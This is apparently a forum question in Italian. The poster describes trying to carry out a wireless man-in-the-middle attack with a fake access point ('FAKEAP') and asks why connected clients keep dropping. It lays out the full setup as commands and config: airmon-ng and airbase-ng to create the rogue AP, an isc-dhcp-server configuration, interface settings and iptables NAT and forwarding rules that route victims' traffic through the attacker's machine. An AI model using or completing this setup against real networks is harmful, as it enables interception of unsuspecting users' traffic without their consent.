Stavo cercando di eseguire un attacco MITM via wireless. La cosa che ho usato è
airbase-ng --essid "FAKEAP" -c 10 wlan0mon
per creare un punto di accesso falso. Questo ha creato un'interfaccia di tocco at0
su cui ho eseguito isc-dhcp-server
per distribuire l'indirizzo IP.
Quando un client si connette a questo punto di accesso, ottiene l'indirizzo IP e mostra la connessione per circa 10 secondi, dopodiché mi disconnetto e mi connetto di nuovo al mio AP per circa 10 secondi.
Questa connessione e disconnessione continua a ripetersi. Quindi qualcuno può dire quale può essere la soluzione possibile?
I passaggi che sto seguendo sono:
$airmon-ng start wlan0
$vim /etc/dhcp/dhcpd.conf
subnet 192.168.1.0 netmask 255.255.255.0 {
range 192.168.1.10 192.168.1.250;
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.1.255
option domain-name-servers 8.8.8.8;
}
$vim /etc/default/isc-dhcp-server
INTERFACESv4="at0"
$vim /etc/network/interfaces
ifauto at0
iface at0 inet static
address 192.168.1.1
netmask 255.255.255.0
gateway 192.168.1.1
broadcast 192.168.1.255
$airbase-ng --essid "FAKEAP" -c 10 wlan0mon
Il comando precedente avvia l'AP falso
$ifconfig at0 up
$iptables -t nat -I POSTROUTING -o eth0 -j MASQUERADE
$iptables -A FORWARDING -i at0 -j ACCEPT
$systemctl restart isc-dhcp-server